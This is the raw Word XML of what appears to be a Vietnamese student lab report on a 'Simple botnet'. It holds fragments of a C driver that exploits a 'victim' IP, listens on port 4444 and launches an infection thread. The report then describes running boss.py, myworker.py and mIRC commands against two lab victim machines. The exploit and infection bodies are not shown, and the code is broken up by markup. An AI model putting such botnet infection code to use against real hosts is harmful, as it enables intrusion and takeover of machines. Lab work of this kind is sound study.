    <w:p w14:paraId="6789432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7E2592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lose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6184190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clos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client);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C0B07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323E319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701A42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lastRenderedPageBreak/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mai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argc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char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*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[]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350369C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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFCAEB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declare variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC74C4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pthread_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action_thread_1, action_thread_2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC69A5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in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independent_thread;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041C8F5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6B3E73A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getting victim IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBA881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argc &gt;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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6504BDE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01F5A940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.0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486AB26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signal =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404BBF9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ip_victim = </w:t>
      </w:r>
      <w:r w:rsidRPr="000B54D1">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>argv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[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1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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3501D2F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2207B9D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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D70E14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0E7ED31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.0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32749D4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ip_victim = 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192.168.253.137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3EC18B2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2204F88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3BFB301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reate thread to listen to port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C43044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independent_thread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thread_creat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&amp;action_thread_1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NULL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Listen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NULL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2080C9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9D876F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exploit the victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6058C7B5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i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(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Exploit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ip_victim,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500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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F24CC3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12779EC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announce success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1213B64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The Exploitation succeeded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194578A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19332A0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create thread to infect the victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADF928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independent_thread =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thread_create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&amp;action_thread_2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NULL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, Infect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NULL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4E050BE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32A7567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wait for thread to finish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ADFFF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thread_joi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(action_thread_2, </w:t>
      </w:r>
      <w:r w:rsidRPr="000B54D1">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NULL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264222B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523A9AD9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6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>// announce finish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5364E7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Finished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7352C53C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</w:p>
    <w:p w14:paraId="49658E66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814C5C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2FF4649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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC4EEDE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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170CA2F4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    </w:t>
      </w:r>
      <w:r w:rsidRPr="000B54D1">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>printf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(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The Exploitation failed</w:t>
      </w:r>
      <w:r w:rsidRPr="000B54D1">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="D7BA7D"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r w:rsidRPr="000B54D1">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD4181F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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AE40EB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    </w:t>
      </w:r>
      <w:r w:rsidRPr="000B54D1">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>return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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B54D1">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w: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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FD412D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  <w:r w:rsidRPr="000B54D1">
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BA31F8" w14:textId="77777777" w:rsidR="000B54D1" w:rsidRPr="000B54D1" w:rsidRDefault="000B54D1" w:rsidP="000B54D1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Fira Code" w:hAnsi="Fira Code" w:cs="Fira Code"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A76D314" w14:textId="4AEB56E1" w:rsidR="000B54D1" w:rsidRDefault="000B54D1" w:rsidP="00BA539D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tiếp theo ta sẽ làm thực hiện chạy các machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21875F0A" w14:textId="2005CEF4" w:rsidR="000B54D1" w:rsidRDefault="000B54D1" w:rsidP="00BA539D">
      <w:r>
        <w:t>Tại máy 1 thực hiện chạy boss.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3498AAFC" w14:textId="46EF2AFB" w:rsidR="000B54D1" w:rsidRDefault="000B54D1" w:rsidP="00BA539D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42F12CB5" wp14:editId="6BF98E7C">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="123525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FC81" w14:textId="48F5671C" w:rsidR="000B54D1" w:rsidRDefault="000B54D1" w:rsidP="00BA539D">
      <w:r>
        <w:t>Tại máy 2 thực hiện chạy myworker.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0449B3" w14:textId="3A7655DF" w:rsidR="000B54D1" w:rsidRDefault="000B54D1" w:rsidP="00BA539D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4774E1DE" wp14:editId="07313020">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="12373081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0818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2385" w14:textId="47EE4C61" w:rsidR="000B54D1" w:rsidRDefault="000B54D1" w:rsidP="00BA539D">
      <w:r>
        <w:t>Tại máy window thực hiện chạy và truyền lệnh từ mIRC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DC1496" w14:textId="57D6B0EB" w:rsidR="000B54D1" w:rsidRDefault="000B54D1" w:rsidP="00BA539D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34177BFD" wp14:editId="39EFC9BF">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="145220845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0845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7D91" w14:textId="0EDC7543" w:rsidR="000B54D1" w:rsidRDefault="000B54D1" w:rsidP="00BA539D">
      <w:r>
        <w:t>Tại máy nạn nhân 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B71440A" w14:textId="1F6BDF36" w:rsidR="000B54D1" w:rsidRDefault="000B54D1" w:rsidP="00BA539D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EA1D578" wp14:editId="0E180A03">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="112621771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771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314D" w14:textId="0185AF18" w:rsidR="000B54D1" w:rsidRDefault="000B54D1" w:rsidP="00BA539D">
      <w:r>
        <w:t>Tại máy nạn nhân 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D5C2CD" w14:textId="55FA311D" w:rsidR="000B54D1" w:rsidRDefault="000B54D1" w:rsidP="00BA539D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="531E0654" wp14:editId="258C6E21">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="15044714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7144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C641" w14:textId="20FFA491" w:rsidR="000B54D1" w:rsidRDefault="000B54D1" w:rsidP="00BA539D">
      <w:r>
        <w:t>Ta đã hoàn thành cuộc tấn công</w:t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9"/>
      <w:footerReference w:type="default" r:id="rId20"/>
      <w:headerReference w:type="first" r:id="rId2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3651" w14:textId="77777777" w:rsidR="00F473D6" w:rsidRDefault="00F473D6" w:rsidP="00572592">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4C08E687" w14:textId="77777777" w:rsidR="00F473D6" w:rsidRDefault="00F473D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auto"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E00002EF" w:usb1="1201F9FB" w:usb2="02002038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BB85" w14:textId="77777777" w:rsidR="00F473D6" w:rsidRDefault="00F473D6" w:rsidP="00572592">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7A6EDB3C" w14:textId="77777777" w:rsidR="00F473D6" w:rsidRDefault="00F473D6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786B07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AA14E4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>:</w:t>
    </w:r>
    <w:r w:rsidR="00AA14E4">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t xml:space="preserve"> Simple botnet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4D1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6F49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8E5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259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E24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066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5B67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81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3BD6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14E4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3D6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9</cp:revision>
  <cp:lastPrinted>2023-04-11T12:56:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-11T04:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-13T09:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>